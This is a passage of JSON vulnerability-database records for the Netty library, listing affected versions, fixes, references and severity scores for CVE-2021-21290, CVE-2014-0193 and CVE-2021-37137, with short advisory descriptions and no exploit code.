Full disclosure will occur either at the end of the 90-day deadline or whenever a patch is made widely available, whichever occurs first.\n\u003e \n\u003e Cheers,\n\u003e Jonathan Leitschuh", "affected": [ { "package": { "name": "io.netty:netty-codec-http", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-codec-http" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.1.59.Final" } ] } ], "versions": [ "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", 
"4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", "4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.6.Final", "4.1.7.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/02/GHSA-5mcr-gq6c-3hq2/GHSA-5mcr-gq6c-3hq2.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/02/GHSA-5mcr-gq6c-3hq2/GHSA-5mcr-gq6c-3hq2.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final", "3.10.3.Final", "3.10.4.Final", "3.10.5.Final", "3.10.6.Final", 
"3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final", "3.9.8.Final", "3.9.9.Final", "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/02/GHSA-5mcr-gq6c-3hq2/GHSA-5mcr-gq6c-3hq2.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-5mcr-gq6c-3hq2" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21290" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/c735357bf29d07856ad171c6611a2e1a0e0000ec" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7bb3cdc192e9a6f863d3ea05422f09fa1ae2b88d4663e63696ee7ef5@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9924ef9357537722b28d04c98a189750b80694a19754e5057c34ca48@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/ra0fc2b4553dd7aaf75febb61052b7f1243ac3a180a71c01f29093013@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra503756ced78fdc2136bd33e87cb7553028645b261b1f5c6186a121e@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb06c1e766aa45ee422e8261a8249b561784186483e8f742ea627bda4@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb51d6202ff1a773f96eaa694b7da4ad3f44922c40b3d4e1a19c2f325@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb592033a2462548d061a83ac9449c5ff66098751748fcd1e2d008233@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc0087125cb15b4b78e44000f841cd37fefedfda942fd7ddf3ad1b528@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc488f80094872ad925f0c73d283d4c00d32def81977438e27a3dc2bb@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcd163e421273e8dca1c71ea298dce3dd11b41d51c3a812e0394e6a5d@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdba4f78ac55f803893a1a2265181595e79e3aa027e2e651dfba98c18@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/02/msg00016.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220210-0011" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4885" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r0053443ce19ff125981559f8c51cf66e3ab4350f47812b8cf0733a05@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r02e467123d45006a1dda20a38349e9c74c3a4b53e2e07be0939ecb3f@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0857b613604c696bf9743f0af047360baaded48b1c75cf6945a083c5@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r10308b625e49d4e9491d7e079606ca0df2f0a4d828f1ad1da64ba47b@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1908a34b9cc7120e5c19968a116ddbcffea5e9deb76c2be4fa461904@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2748097ea4b774292539cf3de6e3b267fc7a88d6c8ec40f4e2e87bd4@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2936730ef0a06e724b96539bc7eacfcd3628987c16b1b99c790e7b87@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2fda4dab73097051977f2ab818f75e04fbcb15bb1003c8530eac1059@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r326ec431f06eab7cb7113a7a338e59731b8d556d05258457f12bac1b@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4efed2c501681cb2e8d629da16e48d9eac429624fd4c9a8c6b8e7020@%3Cdev.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r584cf871f188c406d8bd447ff4e2fd9817fca862436c064d0951a071@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r59bac5c09f7a4179b9e2460e8f41c278aaf3b9a21cc23678eb893e41@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5bf303d7c04da78f276765da08559fdc62420f1df539b277ca31f63b@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r5c701840aa2845191721e39821445e1e8c59711e71942b7796a6ec29@%3Cusers.activemq.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e4a540089760c8ecc2c411309d74264f1dad634ad93ad583ca16214@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e66e286afb5506cdfe9bbf68a323e8d09614f6d1ddc806ed0224700@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r71dbb66747ff537640bb91eb0b2b24edef21ac07728097016f58b01f@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r743149dcc8db1de473e6bff0b3ddf10140a7357bc2add75f7d1fbb12@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r790c2926efcd062067eb18fde2486527596d7275381cfaff2f7b3890@%3Cissues.bookkeeper.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-378", "CWE-379", "CWE-668" ], "github_reviewed": true, "github_reviewed_at": "2021-02-08T20:07:45Z", "nvd_published_at": "2021-02-08T20:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7vpq-g998-qpv7", "published": "2022-05-13T01:54:02Z", "modified": "2024-12-08T05:28:34.511125Z", "aliases": [ "CVE-2014-0193" ], "summary": "Netty denial of service vulnerability", "details": "`WebSocket08FrameDecoder` in Netty 3.6.x before 3.6.9, 3.7.x before 3.7.1, 3.8.x before 3.8.2, 3.9.x before 3.9.1, and 4.0.x before 4.0.19 allows remote attackers to cause a denial of service (memory consumption) via a `TextWebSocketFrame` followed by a long stream of `ContinuationWebSocketFrames`.", "affected": [ { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.6.0.Beta1" }, { "fixed": "3.6.9.Final" } ] } ], "versions": [ 
"3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-7vpq-g998-qpv7/GHSA-7vpq-g998-qpv7.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.7.0.Final" }, { "fixed": "3.7.1.Final" } ] } ], "versions": [ "3.7.0.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-7vpq-g998-qpv7/GHSA-7vpq-g998-qpv7.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.8.0.Final" }, { "fixed": "3.8.2.Final" } ] } ], "versions": [ "3.8.0.Final", "3.8.1.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-7vpq-g998-qpv7/GHSA-7vpq-g998-qpv7.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.9.0.Final" }, { "fixed": "3.9.1.Final" } ] } ], "versions": [ "3.9.0.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-7vpq-g998-qpv7/GHSA-7vpq-g998-qpv7.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0.Alpha1" }, { "fixed": "4.0.19.Final" } ] } ], "versions": [ "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-7vpq-g998-qpv7/GHSA-7vpq-g998-qpv7.json" } }, { "package": { "name": "io.netty:netty-all", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-all" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0.Alpha1" }, { "fixed": "4.0.19.Final" } ] } ], "versions": [ "4.0.0.Beta1", "4.0.0.Beta2", "4.0.0.Beta3", "4.0.0.CR1", "4.0.0.CR2", "4.0.0.CR3", "4.0.0.CR4", "4.0.0.CR5", "4.0.0.CR6", "4.0.0.CR7", "4.0.0.CR8", "4.0.0.CR9", "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.2.Final", "4.0.3.Final", "4.0.4.Final", "4.0.5.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-7vpq-g998-qpv7/GHSA-7vpq-g998-qpv7.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-0193" }, { "type": "WEB", "url": "https://github.com/netty/netty/issues/2441" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/8599ab5bdb761bb99d41a975d689f74c12e4892b" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html" }, { "type": "WEB", "url": "https://web.archive.org/web/20140509033427/http://www.securityfocus.com/bid/67182" }, { "type": "WEB", "url": "https://web.archive.org/web/20140509044857/http://secunia.com/advisories/58280" }, { 
"type": "WEB", "url": "https://web.archive.org/web/20161119201425/http://secunia.com/advisories/59290" }, { "type": "WEB", "url": "http://netty.io/news/2014/04/30/release-day.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1019.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1020.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1021.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1351.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0675.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0720.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0765.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2023-08-07T20:25:36Z", "nvd_published_at": "2014-05-06T14:55:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-9vjp-v76f-g363", "published": "2021-09-09T17:11:31Z", "modified": "2024-03-11T05:32:25.452063Z", "aliases": [ "CVE-2021-37137" ], "related": [ "CGA-rmxq-xv79-3xfc", "CVE-2021-37137" ], "summary": " SnappyFrameDecoder doesn't restrict chunk length any may buffer skippable chunks in an unnecessary way", "details": "### Impact\nThe Snappy frame decoder function doesn't restrict the chunk length which may lead to excessive memory usage. 
Besides this, it may also buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well.\n\nThis vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk.\n\n### Impact\n\nAll users of SnappyFrameDecoder are affected and so the application may be at risk of a DoS attack due to excessive memory usage.\n\n### References\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L79\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L171\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L185", "affected": [ { "package": { "name": "io.netty:netty-codec", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-codec" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.1.68.Final" } ] } ], "versions": [ "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", 
"4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", "4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.59.Final", "4.1.6.Final", "4.1.60.Final", "4.1.61.Final", "4.1.62.Final", "4.1.63.Final", "4.1.64.Final", "4.1.65.Final", "4.1.66.Final", "4.1.67.Final", "4.1.7.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-9vjp-v76f-g363/GHSA-9vjp-v76f-g363.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", 
"3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-9vjp-v76f-g363/GHSA-9vjp-v76f-g363.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final", "3.10.3.Final", "3.10.4.Final", "3.10.5.Final", "3.10.6.Final", "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final", "3.9.8.Final", "3.9.9.Final", "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-9vjp-v76f-g363/GHSA-9vjp-v76f-g363.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-9vjp-v76f-g363" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37137" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/6da4956b31023ae967451e1d94ff51a746a9194f" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5316" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220210-0012" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfb2bf8597e53364ccab212fbcbb2a4e9f0a9e1429b1dc08023c6868e@%3Cdev.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd262f59b1586a108e320e5c966feeafbb1b8cdc96965debc7cc10b16@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75490c61c2cb7b6ae2c81238fd52ae13636c60435abcd732d41531a0@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e05eba32476c580412f9fbdfc9b8782d5b40558018ac4ac07192a04@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5406eaf3b07577d233b9f07cfc8f26e28369e6bab5edfcab41f28abb@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r06a145c9bd41a7344da242cef07977b24abe3349161ede948e30913d@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": 
"https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L79" }, { "type": "WEB", "url": "https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L185" }, { "type": "WEB", "url": "https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/SnappyFrameDecoder.java#L171" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-09-09T14:44:10Z", "nvd_published_at": "2021-10-19T15:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cqqj-4p63-rrmm", "published": 